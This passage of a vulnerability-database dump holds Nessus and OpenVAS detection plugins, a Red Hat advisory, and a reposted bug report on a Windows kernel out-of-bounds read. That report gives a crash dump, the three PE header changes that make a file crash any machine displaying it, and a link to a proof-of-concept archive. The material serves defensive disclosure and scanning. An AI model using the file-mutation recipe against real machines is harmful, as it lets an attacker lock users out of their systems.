(CVE-2019-1371)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when a man-in-the-middle attacker is\n able to successfully bypass the NTLMv2 protection if a\n client is also sending LMv2 responses. An attacker who\n successfully exploited this vulnerability could gain the\n ability to downgrade NTLM security features.\n (CVE-2019-1338)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1346)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2019-1363)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1362, CVE-2019-1364)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2019-1361)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4519976.NASL", "href": "https://www.tenable.com/plugins/nessus/129718", "published": "2019-10-08T00:00:00", "title": "KB4520003: Windows 7 and Windows Server 2008 R2 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129718);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/12/13\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1166\",\n \"CVE-2019-1238\",\n \"CVE-2019-1315\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1338\",\n \"CVE-2019-1339\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1344\",\n \"CVE-2019-1346\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1361\",\n \"CVE-2019-1362\",\n \"CVE-2019-1363\",\n \"CVE-2019-1364\",\n \"CVE-2019-1365\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4519976\");\n script_xref(name:\"MSKB\", value:\"4520003\");\n script_xref(name:\"MSFT\", value:\"MS19-4519976\");\n script_xref(name:\"MSFT\", value:\"MS19-4520003\");\n\n script_name(english:\"KB4520003: Windows 7 and Windows Server 2008 R2 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4520003\nor cumulative update 4519976. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when a man-in-the-middle attacker is\n able to successfully bypass the NTLMv2 protection if a\n client is also sending LMv2 responses. An attacker who\n successfully exploited this vulnerability could gain the\n ability to downgrade NTLM security features.\n (CVE-2019-1338)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1346)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2019-1363)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1362, CVE-2019-1364)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2019-1361)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\");\n # https://support.microsoft.com/en-us/help/4519976/windows-7-update-kb4519976\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60746595\");\n # https://support.microsoft.com/en-us/help/4520003/windows-7-update-kb4520003\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5576f622\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4520003 or Cumulative Update KB4519976.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4519976', '4520003');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4519976, 4520003])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-12-04T11:59:26", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-10-10T00:00:00", "published": "2019-10-10T00:00:00", "id": "1337DAY-ID-33363", "href": "https://0day.today/exploit/description/33363", "title": "Windows Kernel - Out-of-Bounds Read in CI!CipFixImageType While Parsing Malformed PE File", "type": "zdt", "sourceData": "We have encountered a Windows kernel crash in CI!CipFixImageType while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below:\r\n\r\n--- cut ---\r\n*** Fatal System Error: 0x00000050\r\n (0xFFFFF8007B6E00AC,0x0000000000000000,0xFFFFF80079A7E5C1,0x0000000000000000)\r\n\r\nDriver at fault: \r\n*** CI.dll - Address FFFFF80079A7E5C1 base at FFFFF80079A30000, DateStamp 8581dc0d\r\n.\r\nBreak instruction exception - code 80000003 (first chance)\r\n\r\nA fatal system error has occurred.\r\nDebugger entered on first try; Bugcheck callbacks have not been invoked.\r\n\r\nA fatal system error has occurred.\r\n\r\n[...]\r\n\r\n*******************************************************************************\r\n* *\r\n* Bugcheck Analysis *\r\n* *\r\n*******************************************************************************\r\n\r\nPAGE_FAULT_IN_NONPAGED_AREA (50)\r\nInvalid system memory was referenced. This cannot be protected by try-except.\r\nTypically the address is just plain bad or it is pointing at freed memory.\r\nArguments:\r\nArg1: fffff8007b6e00ac, memory referenced.\r\nArg2: 0000000000000000, value 0 = read operation, 1 = write operation.\r\nArg3: fffff80079a7e5c1, If non-zero, the instruction address which referenced the bad memory\r\n\taddress.\r\nArg4: 0000000000000000, (reserved)\r\n\r\n[...]\r\n\r\nTRAP_FRAME: fffffa8375df1860 -- (.trap 0xfffffa8375df1860)\r\nNOTE: The trap frame does not contain all registers.\r\nSome register values may be zeroed or incorrect.\r\nrax=0000000000000000 rbx=0000000000000000 rcx=0000000000000000\r\nrdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000\r\nrip=fffff80079a7e5c1 rsp=fffffa8375df19f0 rbp=fffffa8375df1b30\r\n r8=00000000000000c0 r9=fffff8007b6d0080 r10=0000000000000004\r\nr11=fffff8007b6e0070 r12=0000000000000000 r13=0000000000000000\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz ac po cy\r\nCI!CipFixImageType+0x9d:\r\nfffff800`79a7e5c1 418b44cb3c mov eax,dword ptr [r11+rcx*8+3Ch] ds:fffff800`7b6e00ac=????????\r\nResetting default scope\r\n\r\nLAST_CONTROL_TRANSFER: from fffff80077ea6642 to fffff80077dc46a0\r\n\r\nSTACK_TEXT: \r\nfffffa83`75df0e18 fffff800`77ea6642 : fffff800`7b6e00ac 00000000`00000003 fffffa83`75df0f80 fffff800`77d22be0 : nt!DbgBreakPointWithStatus\r\nfffffa83`75df0e20 fffff800`77ea5d32 : fffff800`00000003 fffffa83`75df0f80 fffff800`77dd0fb0 fffffa83`75df14c0 : nt!KiBugCheckDebugBreak+0x12\r\nfffffa83`75df0e80 fffff800`77dbca07 : ffff8ac5`62b15f80 fffff800`77ed0110 00000000`00000000 fffff800`78063900 : nt!KeBugCheck2+0x952\r\nfffffa83`75df1580 fffff800`77de0161 : 00000000`00000050 fffff800`7b6e00ac 00000000`00000000 fffffa83`75df1860 : nt!KeBugCheckEx+0x107\r\nfffffa83`75df15c0 fffff800`77c7aaef : 00000000`00000000 00000000`00000000 00000000`00000000 fffff800`7b6e00ac : nt!MiSystemFault+0x1d3171\r\nfffffa83`75df16c0 fffff800`77dca920 : fffff800`7b6d0000 00000000`00000000 ffffe687`5031c180 00000000`00000000 : nt!MmAccessFault+0x34f\r\nfffffa83`75df1860 fffff800`79a7e5c1 : ffffe687`4f6b1080 fffff800`7b6d0080 00000000`00000000 fffff800`79a67280 : nt!KiPageFault+0x360\r\nfffffa83`75df19f0 fffff800`79a7c879 : fffffa83`75df1cd0 00000000`00000000 00000000`c00000bb 00000000`00000000 : CI!CipFixImageType+0x9d\r\nfffffa83`75df1a30 fffff800`78285766 : fffffa83`75df1c70 fffff800`7b6d0000 00000000`0000000e fffff800`7b6d0000 : CI!CiValidateImageHeader+0x279\r\nfffffa83`75df1bb0 fffff800`7828528a : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00011000 : nt!SeValidateImageHeader+0xd6\r\nfffffa83`75df1c60 fffff800`7821e0da : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!MiValidateSectionCreate+0x436\r\nfffffa83`75df1e50 fffff800`781fc861 : fffffa83`75df2180 fffffa83`75df1fb0 00000000`40000000 fffffa83`75df2180 : nt!MiValidateSectionSigningPolicy+0xa6\r\nfffffa83`75df1eb0 fffff800`781dca20 : ffffe687`5031c180 fffffa83`75df2180 fffffa83`75df2180 ffffe687`5031c150 : nt!MiCreateNewSection+0x5ad\r\nfffffa83`75df2010 fffff800`781dcd24 : fffffa83`75df2040 ffffd483`86519790 ffffe687`5031c180 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0\r\nfffffa83`75df2100 fffff800`781dc37f : 00000000`11000000 fffffa83`75df24c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4\r\nfffffa83`75df2280 fffff800`781dc110 : 000000bc`f7c78928 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff\r\nfffffa83`75df2360 fffff800`77dce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60\r\nfffffa83`75df23d0 00007ffe`5771c9a4 : 00007ffe`54641ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25\r\n000000bc`f7c788b8 00007ffe`54641ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14\r\n000000bc`f7c788c0 00007ffe`54645640 : 00000203`34a8b3d0 00000007`00000000 00007ffe`56d32770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7\r\n000000bc`f7c78af0 00007ffe`5462c41d : 00000203`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0\r\n000000bc`f7c78b60 00007ffe`559f03d1 : 00000203`34a79130 00000000`00000000 00000203`34a96190 00007ffe`55a06d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d\r\n000000bc`f7c78bc0 00007ffe`559f035c : 00000000`00000000 00007ffe`549f10ff 00000203`34a79130 000000bc`f7c78f10 : shell32!_LoadVersionInfo+0x39\r\n000000bc`f7c78c30 00007ffe`54a6c1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c\r\n\r\n[...]\r\n--- cut ---\r\n\r\nThe direct cause of the crash is an attempt to read from an invalid out-of-bounds address relative to the kernel mapping of the parsed PE file. Specifically, we believe that it is caused by the lack of proper sanitization of the IMAGE_FILE_HEADER.SizeOfOptionalHeader field.\r\n\r\nWe have minimized one of the crashing samples down to a 3-byte difference in relation to the original file: one which increases the value of the SizeOfOptionalHeader field from 0x00e0 to 0x66e0, one that decreases SizeOfImage from 0x8400 to 0x0e00, and one that changes DllCharacteristics from 0 to 0x89 (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | 9).\r\n\r\nThe issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as a limited information disclosure primitive.\r\n\r\nAttached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47486.zip\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://0day.today/exploit/33363"}], "openvas": [{"lastseen": "2019-08-29T14:54:53", "bulletinFamily": "scanner", "description": "Discourse is prone to multiple vulnerabilities in Ruby on Rails.", "modified": "2019-08-28T00:00:00", "published": "2019-06-17T00:00:00", "id": "OPENVAS:1361412562310108598", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108598", "title": "Discourse < 2.3.0.beta5 Multiple Vulnerabilities", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:discourse:discourse\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108598\");\n script_version(\"2019-08-28T13:27:25+0000\");\n script_cve_id(\"CVE-2019-5418\", \"CVE-2019-5419\", \"CVE-2019-5420\");\n script_tag(name:\"last_modification\", value:\"2019-08-28 13:27:25 +0000 (Wed, 28 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-17 06:03:35 +0000 (Mon, 17 Jun 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Discourse < 2.3.0.beta5 Multiple Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_discourse_detect.nasl\");\n script_mandatory_keys(\"discourse/detected\");\n\n script_tag(name:\"summary\", value:\"Discourse is prone to multiple vulnerabilities in Ruby on Rails.\");\n\n script_tag(name:\"affected\", value:\"Discourse before version 2.3.0.beta5.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.3.0.beta5.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://meta.discourse.org/t/discourse-2-3-0-beta5-release-notes/111727\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) )\n exit( 0 );\n\nvers = infos[\"version\"];\n\nif( version_is_less( version:vers, test_version:\"2.3.0\" ) ||\n version_in_range( version:vers, test_version:\"2.3.0.beta1\", test_version2:\"2.3.0.beta4\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"2.3.0.beta5\", install_path:infos[\"location\"] );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:51", "bulletinFamily": "unix", "description": "Red Hat CloudForms Management Engine delivers the insight, control, and automation needed to address the challenges of managing virtual environments. CloudForms Management Engine is built on Ruby on Rails, a model-view-controller (MVC) framework for web application development. Action Pack implements the controller and the view components.\n\nSecurity Fix(es):\n\n* rubygem-actionpack: render file directory traversal in Action View (CVE-2019-5418)\n\n* rubygem-actionpack: denial of service vulnerability in Action View (CVE-2019-5419)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nThis update fixes various bugs and adds enhancements. Documentation for these changes is available from the Release Notes document linked to in the References section.", "modified": "2019-05-29T16:39:07", "published": "2019-05-29T16:36:40", "id": "RHSA-2019:1289", "href": "https://access.redhat.com/errata/RHSA-2019:1289", "type": "redhat", "title": "(RHSA-2019:1289) Important: CloudForms 4.6.9 security, bug fix and enhancement update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}